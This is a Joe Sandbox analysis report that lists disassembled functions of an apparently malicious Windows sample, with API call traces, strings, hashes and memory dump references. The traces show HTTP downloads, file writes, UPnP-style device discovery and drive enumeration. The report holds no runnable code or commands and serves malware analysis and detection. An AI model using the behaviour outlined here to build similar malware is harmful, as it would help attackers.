Instruction Fuzzy Hash: B731A671900705ABC710AF70EC48B97B7B8BF09300F048A2AE569A7691D779F894CB98

Function 004058C0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 73
windowsleepregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.NTDLL ref: 004058D8
GetModuleHandleW.KERNEL32(00000000), ref: 004058F0
Sleep.KERNEL32(00000001), ref: 00405904
GetTickCount.KERNEL32 ref: 0040590A
GetTickCount.KERNEL32 ref: 00405913
wsprintfW.USER32 ref: 00405926
RegisterClassExW.USER32(00000030), ref: 00405933
CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 0040595C
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00405977
TranslateMessage.USER32(?), ref: 00405985
DispatchMessageA.USER32(?), ref: 0040598F
ExitThread.KERNEL32 ref: 004059A1

Strings

0, xrefs: 004058E0
%x%X, xrefs: 0040591A

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
String ID: %x%X$0
API String ID: 716646876-225668902
Opcode ID: 03a63f419c221d19dc1f4a22be05731f57d92fe9a42c49428073284f968a398b
Instruction ID: bd9536bbadbf21864e97b89de5b907373c0f6f38ddabaab6f1c3dd09ba998754
Opcode Fuzzy Hash: 03a63f419c221d19dc1f4a22be05731f57d92fe9a42c49428073284f968a398b
Instruction Fuzzy Hash: C7211AB1940308FBEB109BA0DD49FEE7B78EB04711F14852AF601BA1D0DBB99544CF69

Function 0040E640 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 130networkfileCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0040E668
InternetCrackUrlA.WININET(0040E119,00000000,10000000,0000003C), ref: 0040E6B8
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E6C8
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E701
HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E737
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E75F
InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E7A8
memcpy.NTDLL(00000000,?,00000000), ref: 0040E7FA
InternetCloseHandle.WININET(00000000), ref: 0040E837
InternetCloseHandle.WININET(00000000), ref: 0040E844
InternetCloseHandle.WININET(00000000), ref: 0040E851

Strings

GET, xrefs: 0040E72B
<, xrefs: 0040E670

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
String ID: <$GET
API String ID: 1205665004-427699995
Opcode ID: 74e573df251a3fdd9775996cb884078f57aebd0a6693bdda84868dee8850155f
Instruction ID: bd69c55cfb2b9f93b8bf7ceaaaaaf86fc3309545456039a657a23fe3286800e0
Opcode Fuzzy Hash: 74e573df251a3fdd9775996cb884078f57aebd0a6693bdda84868dee8850155f
Instruction Fuzzy Hash: F75109B1A41228ABDB36DB50CC55BE973BCAB44705F0484E9E60DAA2C0D7B96BC4CF54

Function 0040F240 Relevance: 16.6, APIs: 11, Instructions: 144fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040F272
CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040F293
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040F2B2
GetFileSize.KERNEL32(000000FF,00000000), ref: 0040F2CB
memcmp.NTDLL ref: 0040F35D
UnmapViewOfFile.KERNEL32(00000000), ref: 0040F380
CloseHandle.KERNEL32(00000000), ref: 0040F38A
CloseHandle.KERNEL32(000000FF), ref: 0040F394
CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F3B3
WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040F3D8
CloseHandle.KERNEL32(000000FF), ref: 0040F3E2

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
String ID:
API String ID: 3902698870-0
Opcode ID: 397832f4b3c545954de9817604727ce70a7a27c44a74f567f7741af6b4247064
Instruction ID: 91565a6fedc79cda49cfd97bae5198494bb6489b7e374c7f74ac69d8e3e388a5
Opcode Fuzzy Hash: 397832f4b3c545954de9817604727ce70a7a27c44a74f567f7741af6b4247064
Instruction Fuzzy Hash: 75514BB4E40308FBDB24DBA4CC49F9EB774AB48304F108569F611B72C0D7B9AA44CB98

Function 0040DD50 Relevance: 16.6, APIs: 11, Instructions: 95threadsleepsynchronizationCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0040DD56
GetThreadPriority.KERNEL32(00000000,?,?,?,00408480,?,000000FF), ref: 0040DD5D
GetCurrentThread.KERNEL32 ref: 0040DD68
SetThreadPriority.KERNEL32(00000000,?,?,?,00408480,?,000000FF), ref: 0040DD6F
InterlockedExchangeAdd.KERNEL32(00408480,00000000), ref: 0040DD92
EnterCriticalSection.KERNEL32(000000FB), ref: 0040DDC7
WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040DE12
LeaveCriticalSection.KERNEL32(000000FB), ref: 0040DE2E
Sleep.KERNEL32(00000001), ref: 0040DE5E
GetCurrentThread.KERNEL32 ref: 0040DE6D
SetThreadPriority.KERNEL32(00000000,?,?,?,00408480), ref: 0040DE74

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
String ID:
API String ID: 3862671961-0
Opcode ID: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
Instruction ID: 15ec6ce41066bd2df298828df26a4308ea05a03792f046612c1f6ffbd780898a
Opcode Fuzzy Hash: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
Instruction Fuzzy Hash: 1B412C74E00209DBDB04DFE4D844BAEBB71FF54315F108169E916AB381D7789A84CF99

Function 00401D60 Relevance: 13.6, APIs: 9, Instructions: 141COMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
InterlockedDecrement.KERNEL32(?), ref: 00401DB0
InterlockedDecrement.KERNEL32(?), ref: 00401DC3
InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
InterlockedDecrement.KERNEL32(?), ref: 00401E5B
InterlockedDecrement.KERNEL32(?), ref: 00401EF6
setsockopt.WS2_32 ref: 00401F2C
closesocket.WS2_32(?), ref: 00401F39

Part of subcall function 0040DF20: NtQuerySystemTime.NTDLL(0040BD65), ref: 0040DF2A
Part of subcall function 0040DF20: RtlTimeToSecondsSince1980.NTDLL(0040BD65,?), ref: 0040DF38

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
String ID:
API String ID: 671207744-0
Opcode ID: 8dc138b45ca20bf30cfdef2e37b67658010477f0f0075654919bb451a9b4aa4a
Instruction ID: f2cbb4ded8662be063e38a6044f3a63d93470e371ff4fbf655dea468244fd3f8
Opcode Fuzzy Hash: 8dc138b45ca20bf30cfdef2e37b67658010477f0f0075654919bb451a9b4aa4a
Instruction Fuzzy Hash: 4F51B075608702ABC704DF29D888B9BFBE5BF88314F40862EF85D93360D774A545CB96

Function 0040E310 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 60sleepCOMMON

Download Yara Rule

APIs

recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040E35E
Sleep.KERNEL32(000003E8), ref: 0040E36E
StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040E38B
StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040E3A1
StrChrA.SHLWAPI(?,0000000D), ref: 0040E3CE

Strings

HTTP/1.1 200 OK, xrefs: 0040E37F
LOCATION: , xrefs: 0040E395

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: Sleeprecvfrom
String ID: HTTP/1.1 200 OK$LOCATION:
API String ID: 668330359-3973262388
Opcode ID: adc9e1b642c8ef13301026d6139dd454e63dc363d970614d04e973e17512e1fe
Instruction ID: e67ba9521a541be798431772fb319970cc3d6429c6b3b7a9c3ce28b53cac335a
Opcode Fuzzy Hash: adc9e1b642c8ef13301026d6139dd454e63dc363d970614d04e973e17512e1fe
Instruction Fuzzy Hash: 5E2130B0940218ABDB20CB65DC45BE9BB74AB04308F1085E9EB19B72C0D7B95AD6CF5D

Function 0040F4B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57networksleepCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040F4C7
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040F4E6
HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040F50F
InternetCloseHandle.WININET(00000000), ref: 0040F538
InternetCloseHandle.WININET(00000000), ref: 0040F542
Sleep.KERNEL32(000003E8), ref: 0040F54D

Strings

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 0040F4C2

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
API String ID: 2743515581-2960703779
Opcode ID: eac7a16544c45e3c29eec32ac406d7a69024a54342cccca2c138cb753e28bf4a
Instruction ID: af5d65e8d2fa993cc87ce820da5284d466d7432e490674ab1d3698c460306143
Opcode Fuzzy Hash: eac7a16544c45e3c29eec32ac406d7a69024a54342cccca2c138cb753e28bf4a
Instruction Fuzzy Hash: E7212975A40308BBDB20DF94CC49FEEB7B5AB04705F1084A5EA11AB2C0C7B9AA84CB55

Function 0040BC70 Relevance: 12.1, APIs: 8, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(004165F8,?,?,?,?,?,?,00408403), ref: 0040BC7B
CreateFileW.KERNEL32(004163E0,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040BCCD
CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040BCEE
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040BD0D
GetFileSize.KERNEL32(000000FF,00000000), ref: 0040BD22
UnmapViewOfFile.KERNEL32(00000000), ref: 0040BD88
CloseHandle.KERNEL32(00000000), ref: 0040BD92
CloseHandle.KERNEL32(000000FF), ref: 0040BD9C

Part of subcall function 0040DF20: NtQuerySystemTime.NTDLL(0040BD65), ref: 0040DF2A
Part of subcall function 0040DF20: RtlTimeToSecondsSince1980.NTDLL(0040BD65,?), ref: 0040DF38

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
String ID:
API String ID: 439099756-0
Opcode ID: 95b7ad4b48b2612a2ac74941d1961fd8d23959eee21eec156b7f746c57c5f411
Instruction ID: 789285c27e92e60cc42243599a26330008c438e37824d2da8ff51af530b364ad
Opcode Fuzzy Hash: 95b7ad4b48b2612a2ac74941d1961fd8d23959eee21eec156b7f746c57c5f411
Instruction Fuzzy Hash: 0F413A74E40309EBDB10EBA4DC4ABAEB774EB44705F20856AF6117A2C1C7B96941CB9C

Function 00405C00 Relevance: 12.1, APIs: 8, Instructions: 97fileCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00415B88,?,?,?,?,?,004083CD), ref: 00405C0B
CreateFileW.KERNEL32(00415FC8,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,004083CD), ref: 00405C25
CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405C46
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405C65
GetFileSize.KERNEL32(000000FF,00000000), ref: 00405C7E
UnmapViewOfFile.KERNEL32(00000000), ref: 00405D0B
CloseHandle.KERNEL32(00000000), ref: 00405D15
CloseHandle.KERNEL32(000000FF), ref: 00405D1F

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
String ID:
API String ID: 3956458805-0
Opcode ID: d5d83b1f14bbe53c7a306cab709472362fb8432e959898be764c548cb6fd93a9
Instruction ID: 999418e1eeb904d95552c7fd1475d0c30f1e1fd8627807f9f1e65d0b0efdc9c4
Opcode Fuzzy Hash: d5d83b1f14bbe53c7a306cab709472362fb8432e959898be764c548cb6fd93a9
Instruction Fuzzy Hash: DE310E74E40209EBDB14DBA4DC49FAFB774EB48700F20856AE6017B2C0D7B96941CF99

Function 004060A0 Relevance: 10.7, APIs: 7, Instructions: 176fileCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00415B88,00000000,0040C2A2,006A0266,?,0040C2BE,00000000,0040D66C,?), ref: 004060AF
memcpy.NTDLL(?,00000000,00000100), ref: 00406141
CreateFileW.KERNEL32(00415FC8,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00406265
WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 004062C7
FlushFileBuffers.KERNEL32(000000FF), ref: 004062D3
CloseHandle.KERNEL32(000000FF), ref: 004062DD
LeaveCriticalSection.KERNEL32(00415B88,?,?,?,?,?,?,0040C2BE,00000000,0040D66C,?), ref: 004062E8

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
String ID:
API String ID: 1457358591-0
Opcode ID: e72a487dce04114ef622edc0900d7397c89588e022fce289eeb1184eb778240f
Instruction ID: a605c5c2860c2acc1241a09a2373603bf375adc509756cd8cb030c585388e075
Opcode Fuzzy Hash: e72a487dce04114ef622edc0900d7397c89588e022fce289eeb1184eb778240f
Instruction Fuzzy Hash: D171BCB4E042099FCB04DF94D981FEFB7B1AF88304F14816DE506AB381D779A951CBA9

Function 0040ECC0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,device), ref: 0040ED7C
lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EDCB
SysFreeString.OLEAUT32(00000000), ref: 0040EDDF
SysFreeString.OLEAUT32(00000000), ref: 0040EDF7

Strings

deviceType, xrefs: 0040ED86
device, xrefs: 0040ED73

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: FreeStringlstrcmpi
String ID: device$deviceType
API String ID: 1602765415-3511266565
Opcode ID: a9e600dac57c6bff42fbd44a0ab5cbd0dab53693824f3ca44f5ffdbb74c8a893
Instruction ID: 03739fb7cbf0ac8b4f24cf275543a684364e3b5b0ef8f18e7a9da7a5ef98527e
Opcode Fuzzy Hash: a9e600dac57c6bff42fbd44a0ab5cbd0dab53693824f3ca44f5ffdbb74c8a893
Instruction Fuzzy Hash: 1A413A75A0020ADFCB04DF99D884BAFB7B5FF48304F108969E505A7390D778AA91CB95

Function 0040EB60 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,service), ref: 0040EC1C
lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EC6B
SysFreeString.OLEAUT32(00000000), ref: 0040EC7F
SysFreeString.OLEAUT32(00000000), ref: 0040EC97

Strings

serviceType, xrefs: 0040EC26
service, xrefs: 0040EC13

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: FreeStringlstrcmpi
String ID: service$serviceType
API String ID: 1602765415-3667235276
Opcode ID: 5f17999700f738b1f8b02f544927b29f5482ea2caa1df498b33a2fd0fcdce1b7
Instruction ID: 010777473a756836e58c8d4bedbd534eac8e5d19c37eb4cb5fbe46cee8795b1d
Opcode Fuzzy Hash: 5f17999700f738b1f8b02f544927b29f5482ea2caa1df498b33a2fd0fcdce1b7
Instruction Fuzzy Hash: 9F416A74A0020ADFDB04CF99C884BAFB7B9BF48304F108969E505B7390D779AE81CB95

Function 004022C0 Relevance: 10.6, APIs: 7, Instructions: 95COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 3ac2f8f5af7b0d3c40b8ef892d708a394eff8d7b565022b2108cc4f7acf51177
Instruction ID: a453b5b0d0ea6fd4c501cc83d62b7a74cd48d0bc9ee55fa6e36116878b1ddbe7
Opcode Fuzzy Hash: 3ac2f8f5af7b0d3c40b8ef892d708a394eff8d7b565022b2108cc4f7acf51177
Instruction Fuzzy Hash: D231D1722012059BC710AFB5ED8CAE7B7A8FB44314F04863EE55AD3280DB78A4449BA9

Function 0040ED01 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,device), ref: 0040ED7C
lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EDCB
SysFreeString.OLEAUT32(00000000), ref: 0040EDDF
SysFreeString.OLEAUT32(00000000), ref: 0040EDF7

Strings

deviceType, xrefs: 0040ED86
device, xrefs: 0040ED73

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: FreeStringlstrcmpi
String ID: device$deviceType
API String ID: 1602765415-3511266565
Opcode ID: c6fd2f803c2933f412baf75b0cc734dbcdbc8a3f85456721b664ef36854a057b
Instruction ID: 82367b585ef85f09a19fbcbd702cec43aacbd83c2379c0e5ae25b899a50ddae9
Opcode Fuzzy Hash: c6fd2f803c2933f412baf75b0cc734dbcdbc8a3f85456721b664ef36854a057b
Instruction Fuzzy Hash: F1313970A0020ADFCB14CF99D884BEFB7B5FF88304F108969E514A7390D778AA91CB95

Function 0040EBA1 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,service), ref: 0040EC1C
lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EC6B
SysFreeString.OLEAUT32(00000000), ref: 0040EC7F
SysFreeString.OLEAUT32(00000000), ref: 0040EC97

Strings

serviceType, xrefs: 0040EC26
service, xrefs: 0040EC13

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: FreeStringlstrcmpi
String ID: service$serviceType
API String ID: 1602765415-3667235276
Opcode ID: fbd28e8abd5f6cdc19dfc357c6f3e47e72171285df1c210c36e8075dc31c5cfb
Instruction ID: b0af1682f63206834f838cc0e71cdea1734b5e967c65deefb948a4066f0743c7
Opcode Fuzzy Hash: fbd28e8abd5f6cdc19dfc357c6f3e47e72171285df1c210c36e8075dc31c5cfb
Instruction Fuzzy Hash: 09312874A0420A9FDB04CF99C884BEFB7B5BF48304F108969E615B7390D779AA81CB95

Function 004077F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000003E8), ref: 0040786D
Sleep.KERNEL32(000003E8), ref: 0040789C
wsprintfA.USER32 ref: 004078C7
DeleteUrlCacheEntry.WININET(?), ref: 004078D7
Sleep.KERNEL32(000DBBA0), ref: 0040791F

Strings

%s%s, xrefs: 004078BB

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: Sleep$CacheDeleteEntrywsprintf
String ID: %s%s
API String ID: 1447977647-3252725368
Opcode ID: 0f885536a534958de828f6dadf3c238a14188cbeabebc74b6a6376721a3f9b9c
Instruction ID: a96cc5071c69656b1b6f4b00c6699880e4d6530ea1aa1078cf67c052952084b8
Opcode Fuzzy Hash: 0f885536a534958de828f6dadf3c238a14188cbeabebc74b6a6376721a3f9b9c
Instruction Fuzzy Hash: 643116B0C01218DFCB50DFA8DC887EDBBB4BB48304F1085AAE609B6290D7795AC4CF59

Function 004063E0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55registryCOMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNEL32 ref: 004063E6
RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406434
RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406461
RegCloseKey.ADVAPI32(?), ref: 0040647E

Strings

NoDrives, xrefs: 00406458
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00406427

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

